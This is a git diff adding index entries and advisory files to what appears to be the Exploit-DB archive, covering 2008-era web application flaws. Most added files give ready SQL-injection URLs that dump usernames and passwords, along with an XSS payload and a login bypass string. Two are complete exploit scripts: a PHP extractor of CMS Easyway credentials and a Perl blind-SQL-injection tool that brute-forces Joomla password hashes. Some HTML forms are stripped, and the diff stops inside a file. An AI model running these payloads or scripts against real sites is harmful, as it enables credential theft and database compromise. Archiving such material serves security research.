diff --git a/files.csv b/files.csv
index 1d512090f..9e839ef95 100755
--- a/files.csv
+++ b/files.csv
@@ -28579,6 +28579,7 @@ id,file,description,date,author,platform,type,port
 31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 'AccesCodeStart.asp' Cross-Site Scripting Vulnerability",2008-05-13,"Brad Antoniewicz",asp,webapps,0
 31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal 'linking.page.php' SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0
 31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0
+31789,platforms/windows/remote/31789.py,"PCMAN FTP 2.07 - Buffer Overflow Exploit",2014-02-20,Sumit,windows,remote,21
 31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0
 31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 ""CATV5_Backbone_Bus"" - Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
 31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80
@@ -28634,3 +28635,29 @@ id,file,description,date,author,platform,type,port
 31843,platforms/asp/webapps/31843.txt,"Excuse Online 'pwd.asp' SQL Injection Vulnerability",2008-05-26,Unohope,asp,webapps,0
 31844,platforms/php/webapps/31844.txt,"phpFix 2.0 fix/browse.php kind Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
 31845,platforms/php/webapps/31845.txt,"phpFix 2.0 auth/00_pass.php account Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
+31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
+31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
+31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
+31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 class/ApplyDB.php Unrestricted File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0
+31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 post3/Book.asp review Parameter XSS",2008-05-26,Unohope,asp,webapps,0
+31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
+31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
+31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0
+31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 'sentout.asp' Unauthorized Access Vulnerability",2008-05-26,Unohope,asp,webapps,0
+31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 'news.php' Cross-Site Scripting Vulnerability",2008-05-27,ZoRLu,php,webapps,0
+31856,platforms/windows/dos/31856.html,"CA Internet 
Security Suite 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2008-05-28,Nine:Situations:Group,windows,dos,0
+31857,platforms/php/webapps/31857.txt,"Joomla! and Mambo Artists Component 'idgalery' Parameter SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0
+31858,platforms/php/webapps/31858.txt,"Calcium 3.10/4.0.4 'Calcium40.pl' Cross Site Scripting Vulnerability",2008-05-28,"Marvin Simkin",php,webapps,0
+31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 'site' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0
+31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0
+31861,platforms/asp/webapps/31861.txt,"dvbbs 8.2 'login.asp' Multiple SQL Injection Vulnerabilities",2008-05-29,hackerbinhphuoc,asp,webapps,0
+31862,platforms/hardware/remote/31862.txt,"Xerox DocuShare 6 dsdn/dsweb/SearchResults URI XSS",2008-05-29,Doz,hardware,remote,0
+31863,platforms/hardware/remote/31863.txt,"Xerox DocuShare 6 dsdn/dsweb/Services/User URI XSS",2008-05-29,Doz,hardware,remote,0
+31864,platforms/hardware/remote/31864.txt,"Xerox DocuShare 6 docushare/dsweb/ServicesLib/Group URI XSS",2008-05-29,Doz,hardware,remote,0
+31865,platforms/asp/webapps/31865.txt,"DotNetNuke 4.8.3 'Default.aspx' Cross-Site Scripting Vulnerability",2008-05-30,"AmnPardaz Security Research Team",asp,webapps,0
+31866,platforms/php/webapps/31866.txt,"TorrentTrader Classic 1.x 'scrape.php' SQL Injection Vulnerability",2008-05-31,"Charles Vaughn",php,webapps,0
+31867,platforms/php/webapps/31867.php,"CMS Easyway 'mid' Parameter SQL Injection Vulnerability",2008-05-30,Lidloses_Auge,php,webapps,0
+31868,platforms/php/webapps/31868.txt,"OtomiGenX 2.2 'userAccount' Parameter SQL Injection Vulnerability",2008-06-02,hadihadi,php,webapps,0
+31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 'index.asp' SQL Injection 
Vulnerability",2008-06-02,KnocKout,asp,webapps,0
+31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component 'forum' Parameter SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0
+31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0
diff --git a/platforms/asp/webapps/31850.txt b/platforms/asp/webapps/31850.txt
new file mode 100755
index 000000000..3fd2ef856
--- /dev/null
+++ b/platforms/asp/webapps/31850.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29375/info
+
+Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/post3/Book.asp?review=
\ No newline at end of file
diff --git a/platforms/asp/webapps/31851.txt b/platforms/asp/webapps/31851.txt
new file mode 100755
index 000000000..d1f588985
--- /dev/null
+++ b/platforms/asp/webapps/31851.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29375/info
+
+Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/post3/view.asp?id=-99)+union+select+0,uid,password,3,4,5,6,7,8,9,10+from+user+where+1=(1
\ No newline at end of file
diff --git a/platforms/asp/webapps/31852.txt b/platforms/asp/webapps/31852.txt
new file mode 100755
index 000000000..e64358221
--- /dev/null
+++ b/platforms/asp/webapps/31852.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/29375/info
+
+Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/post3/book.asp?review=-99')+union+select+0,password,uid,3,4,5,6,7,8,9,10+from+user+where+1=1+union+select+*+From+公佈欄
+;+Where+'%'=('
\ No newline at end of file
diff --git a/platforms/asp/webapps/31854.html b/platforms/asp/webapps/31854.html
new file mode 100755
index 000000000..371532b98
--- /dev/null
+++ b/platforms/asp/webapps/31854.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29376/info
+
+The Campus Request Repairs System is prone to an unauthorized-access vulnerability because it fails to adequately limit access to administrative scripts used for creating accounts.
+
+An attacker can exploit this vulnerability to gain unauthorized administrative access to the application; other attacks are also possible.
+
+The Campus Request Repairs System 1.2 is vulnerable; other versions may also be vulnerable.
+
+
user:
pass:
\ No newline at end of file
diff --git a/platforms/asp/webapps/31859.txt b/platforms/asp/webapps/31859.txt
new file mode 100755
index 000000000..db8c32cfe
--- /dev/null
+++ b/platforms/asp/webapps/31859.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29426/info
+
+JustPORTAL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+JustPORTAL 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/lab/JustPORTALv1.0/panel/videogit.asp?site=1+union+select+0,(sifre),kullaniciadi,3,4,5+from+uyeler
+http://www.example.com/lab/JustPORTALv1.0/panel/resimgit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler
+http://www.example.com/lab/JustPORTALv1.0/panel/menugit.asp?site=1+union+select+0,sifre,kullaniciadi+from+uyeler
+http://www.example.com/lab/JustPORTALv1.0/panel/habergit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler
\ No newline at end of file
diff --git a/platforms/asp/webapps/31860.txt b/platforms/asp/webapps/31860.txt
new file mode 100755
index 000000000..ee7975770
--- /dev/null
+++ b/platforms/asp/webapps/31860.txt
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/29427/info
+
+Proje ASP Portal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Proje ASP Portal 2.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/portal/yonetici/sayfalar.asp?islem=menuduzenle&id=3+union+select+0,kadi,sifre,3,4,5,6+from+uyeler
+http://www.example.com/portal/yonetici/bloklar.asp?islem=bloklar&id=1+union+select+0,sifre,kadi,null,4,5+from+uyeler
+http://www.example.com/portal/yonetici/chat.asp?islem=chat&id=1+union+select+0,sifre+from+uyeler
+http://www.example.com/portal/yonetici/dostsiteler.asp?islem=dost&id=8+union+select+0,kadi,2,sifre+from+uyeler
+http://www.example.com/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
+http://www.example.com/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,kadi,2,3+from+uyeler
+http://www.example.com/portal/yonetici/haber.asp?islem=haber&id=1+union+select+0,1,2,kadi,sifre,5,6,7,8,9+from+uyeler
+http://www.example.com/portal/yonetici/ilan.asp?islem=ilankategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
+http://www.example.com/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
+http://www.example.com/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
+http://www.example.com/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
+http://www.example.com/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
+http://www.example.com/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,sifre+from+uyeler
+http://www.example.com/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,kadi+from+uyeler
+http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
+http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
+http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
+http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,kadi,2,3+from+uyeler
+http://www.example.com/portal/yonetici/uyeler.asp?islem=uyebilgi&id=1+union+select+0,1,2,3,4,sifre,kadi,7,8,1,1,1,1,1,1,9,1,0,1,1,1,1,1,1+from+uyeler
\ No newline at end of file
diff --git a/platforms/asp/webapps/31861.txt b/platforms/asp/webapps/31861.txt
new file mode 100755
index 000000000..17434afee
--- /dev/null
+++ b/platforms/asp/webapps/31861.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29429/info
+
+The 'dvbbs' program is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect dvbbs 8.2; other versions may also be affected.
+
+http:///www.example.com/?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253
+D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25
+
+
diff --git a/platforms/asp/webapps/31865.txt b/platforms/asp/webapps/31865.txt
new file mode 100755
index 000000000..e8b6fd012
--- /dev/null
+++ b/platforms/asp/webapps/31865.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29437/info
+
+DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+DotNetNuke 4.8.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From WWW.BugReport.IR/)';eval(x);alert().aspx http://www.example.com/Default.aspx/bugreport/"onmouseover="var a='.aspx?';document.location='http://www.bugreport.ir/?archive';
\ No newline at end of file
diff --git a/platforms/asp/webapps/31869.txt b/platforms/asp/webapps/31869.txt
new file mode 100755
index 000000000..137e7893a
--- /dev/null
+++ b/platforms/asp/webapps/31869.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29471/info
+
+i-pos Storefront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+i-pos Storefront 1.3 Beta is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
\ No newline at end of file
diff --git a/platforms/asp/webapps/31871.txt b/platforms/asp/webapps/31871.txt
new file mode 100755
index 000000000..e7aaa4951
--- /dev/null
+++ b/platforms/asp/webapps/31871.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/29478/info
+
+Te Ecard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor
+http://www.example.com/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor
+http://www.example.com/tecard/admin/card.asp?gorev=duzenle&id=99999+union+select+0x31,null,2,3,sifre,5,6,kullanici_adi,5,0+from+editor+where+id=1
+http://www.example.com/lab/tecard/admin/midi.asp?gorev=duzenle&id=1+union+select+0,1,kullanici_adi,3,4,sifre+from+editor
+http://www.example.com/lab/tecard/admin/cat.asp?gorev=duzenle&id=1+union+select+kullanici_adi,1,sifre,3,4,5+from+editor
+http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor
+http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor
\ No newline at end of file
diff --git a/platforms/hardware/remote/31862.txt b/platforms/hardware/remote/31862.txt
new file mode 100755
index 000000000..23a9113a8
--- /dev/null
+++ b/platforms/hardware/remote/31862.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29430/info
+
+Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Xerox DocuShare 6 and prior versions are vulnerable.
+
+http://www.example.com/dsdn/dsweb/SearchResults/XSS
\ No newline at end of file
diff --git a/platforms/hardware/remote/31863.txt b/platforms/hardware/remote/31863.txt
new file mode 100755
index 000000000..a47b24f59
--- /dev/null
+++ b/platforms/hardware/remote/31863.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29430/info
+
+Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Xerox DocuShare 6 and prior versions are vulnerable.
+
+http://www.example.com/dsdn/dsweb/Services/User-XSS
\ No newline at end of file
diff --git a/platforms/hardware/remote/31864.txt b/platforms/hardware/remote/31864.txt
new file mode 100755
index 000000000..cd64a23c0
--- /dev/null
+++ b/platforms/hardware/remote/31864.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29430/info
+
+Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Xerox DocuShare 6 and prior versions are vulnerable.
+
+http://www.example.com/docushare/dsweb/ServicesLib/Group-#/XSS
\ No newline at end of file
diff --git a/platforms/php/webapps/31846.txt b/platforms/php/webapps/31846.txt
new file mode 100755
index 000000000..e17d448b0
--- /dev/null
+++ b/platforms/php/webapps/31846.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29372/info
+
+ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.
+
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable.
+
+http://www.example.com/class/HomepageTop.php?teacher_id=-99'+union+select+0,1,teacher_password,teacher_account,4,5+from+teacher/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31847.txt b/platforms/php/webapps/31847.txt
new file mode 100755
index 000000000..9b9a80f76
--- /dev/null
+++ b/platforms/php/webapps/31847.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29372/info
+
+ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.
+
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable.
+
+http://www.example.com/class/HomepageMain.php?teacher_id=-99'+union+select+0,teacher_account,2,3,4,5,6,7,teacher_password+from+teacher/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31848.txt b/platforms/php/webapps/31848.txt
new file mode 100755
index 000000000..97aa96f0f
--- /dev/null
+++ b/platforms/php/webapps/31848.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29372/info
+
+ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.
+
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable.
+
+http://www.example.com/class/MessageReply.php?teacher_id=1&message_id=-99'+union+select+teacher_account,teacher_password,3,4+from+teacher/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31849.html b/platforms/php/webapps/31849.html
new file mode 100755
index 000000000..f9fbe3da7
--- /dev/null
+++ b/platforms/php/webapps/31849.html
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/29372/info
+
+ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.
+
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable.
+
+
+ + +
+ +
\ No newline at end of file
diff --git a/platforms/php/webapps/31855.txt b/platforms/php/webapps/31855.txt
new file mode 100755
index 000000000..455bef68a
--- /dev/null
+++ b/platforms/php/webapps/31855.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29388/info
+
+Tr Script News is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Tr Script News 2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/news/news.php?mode=voir&nb=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/31857.txt b/platforms/php/webapps/31857.txt
new file mode 100755
index 000000000..b78316677
--- /dev/null
+++ b/platforms/php/webapps/31857.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29407/info
+
+The Artists component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+
+http://www.example.com/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*
+
diff --git a/platforms/php/webapps/31858.txt b/platforms/php/webapps/31858.txt
new file mode 100755
index 000000000..2f043c6d9
--- /dev/null
+++ b/platforms/php/webapps/31858.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29411/info
+
+Calcium is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Calcium 4.0.4 and 3.10 are vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-bin/Calcium40.pl?Op=ShowIt&CalendarName=[xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/31866.txt b/platforms/php/webapps/31866.txt
new file mode 100755
index 000000000..6219c5598
--- /dev/null
+++ b/platforms/php/webapps/31866.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29451/info
+
+TorrentTrader Classic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/scrape.php?info_hash=%22union%20select%201,1,1,1,ip%20from%20users--%20%20%20
\ No newline at end of file
diff --git a/platforms/php/webapps/31867.php b/platforms/php/webapps/31867.php
new file mode 100755
index 000000000..0c5274010
--- /dev/null
+++ b/platforms/php/webapps/31867.php
@@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/29461/info + +CMS Easyway is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + php '.$argv[0].' http://www.site.com 1 +# +############################################################### +'); +if ($argc == 3) { +echo "\nExploiting in progress:"; +$url = $argv[1]; +$source = file_get_contents($url.'/index.php?mid=null+order+by+100/*'); +$errorcount = substr_count($source,'not a valid MySQL'); +$sql = '/index.php?mid=null+union+select+'; +for ($i = 25; $i>=1; $i--) { + $source = file_get_contents($url.'/index.php?mid=null+order+by+'.$i.'/*'); + if (substr_count($source,'not a valid MySQL')!=$errorcount) { + $errorcount2 = $i; + $i = 1; + } +} +for ($j=1; $j<$errorcount2; $j++) { + $sql = $sql.'concat(0x3a3a3a3a3a,login,0x3a3a313a3a,passwort,0x3a3a323a3a),'; +} +$sql = $sql.'concat(0x3a3a3a3a3a,login,0x3a3a313a3a,passwort,0x3a3a323a3a)+from+cms_benutzer+where+id='.$argv[2].'/*'; +$source = file_get_contents($url.$sql); +echo "\n"; +if (strpos($source,'::::')!=0) { + echo 'User: '.substr($source,strpos($source,'::::')+5,strpos($source,'::1::')-strpos($source,'::::')-5)."\n"; + echo 'Hash: '.substr($source,strpos($source,'::1::')+5,strpos($source,'::2::')-strpos($source,'::1::')-5)."\n"; +} else { + echo 'Exploit failed!'."\n"; +} +} else { +echo "\nNot enough arguments!\n"; +} +?> + + diff --git a/platforms/php/webapps/31868.txt b/platforms/php/webapps/31868.txt new file mode 100755 index 000000000..e0ca55ebe --- /dev/null +++ b/platforms/php/webapps/31868.txt 
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/29470/info
+
+OtomiGenX is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+OtomiGenX 2.2 is affected by this issue; other versions may also be vulnerable.
+
+The following example POST parameters are available to demonstrate this issue:
+
+userAccount: admin ' or 1=1/*
+userPassword:
+userType: Staff
\ No newline at end of file
diff --git a/platforms/php/webapps/31870.pl b/platforms/php/webapps/31870.pl
new file mode 100755
index 000000000..d127fc59f
--- /dev/null
+++ b/platforms/php/webapps/31870.pl
@@ -0,0 +1,137 @@
+source: http://www.securityfocus.com/bid/29475/info
+
+The Joo!BB component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Joo!BB 0.5.9 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl
+use LWP::UserAgent;
+use Getopt::Long;
+
+if(!$ARGV[1])
+{
+ print "
+\n";
+ print "
+#############################################################\n";
+ print " # Joomla Component Joo!BB Blind SQL Injection Exploit
+#\n";
+ print " # Author:His0k4 [ALGERIAN HaCkeR]
+#\n";
+ print " #
+#\n";
+ print " # Conctact: His0k4.hlm[at]gamil.com
+#\n";
+ print " # Greetz: All friends & muslims HacKeRs
+#\n";
+ print " # Greetz2: http://www.palcastle.org/cc :)
+#\n";
+ print " #
+#\n";
+ print " # Usage: perl jobb.pl host path
+#\n";
+ print " # Example: perl jobb.pl www.host.com /joomla/ -f 1
+#\n";
+ print " #
+#\n";
+ print " # Options:
+#\n";
+ print " # -f Forum id
+#\n";
+ print " # Note:
+#\n";
+ print " # If you need to change the match value so do it :D
+#\n";
+ print "
+#############################################################\n";
+ exit;
+}
+
+my $host = $ARGV[0];
+my $path = $ARGV[1];
+my $userid = 1;
+my $fid = $ARGV[2];
+
+my %options = ();
+GetOptions(\%options, "u=i", "p=s", "f=i");
+
+print "[~] Exploiting...\n";
+
+if($options{"u"})
+{
+ $userid = $options{"u"};
+}
+
+if($options{"f"})
+{
+ $fid = $options{"f"};
+}
+
+syswrite(STDOUT, "[~] MD5-Hash: ", 14);
+
+for(my $i = 1; $i <= 32; $i++)
+{
+ my $f = 0;
+ my $h = 48;
+ while(!$f && $h <= 57)
+ {
+ if(istrue2($host, $path, $userid, $fid, $i, $h))
+ {
+ $f = 1;
+ syswrite(STDOUT, chr($h), 1);
+ }
+ $h++;
+ }
+ if(!$f)
+ {
+ $h = 97;
+ while(!$f && $h <= 122)
+ {
+ if(istrue2($host, $path, $userid, $fid, 
$i, $h))
+ {
+ $f = 1;
+ syswrite(STDOUT, chr($h), 1);
+ }
+ $h++;
+ }
+ }
+}
+
+print "\n[~] Exploiting done\n";
+
+sub istrue2
+{
+ my $host = shift;
+ my $path = shift;
+ my $uid = shift;
+ my $fid = shift;
+ my $i = shift;
+ my $h = shift;
+
+ my $ua = LWP::UserAgent->new;
+ my $query =
+"http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid."
+and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1
+),".$i.",1))=CHAR(".$h.")";
+
+ if($options{"p"})
+ {
+ $ua->proxy('http', "http://".$options{"p"});
+ }
+
+ my $resp = $ua->get($query);
+ my $content = $resp->content;
+ my $regexp = "Announcements";
+
+ if($content =~ /$regexp/)
+ {
+ return 1;
+ }
+ else
+ {
+ return 0;
+ }
+
+}
diff --git a/platforms/windows/dos/31856.html b/platforms/windows/dos/31856.html
new file mode 100755
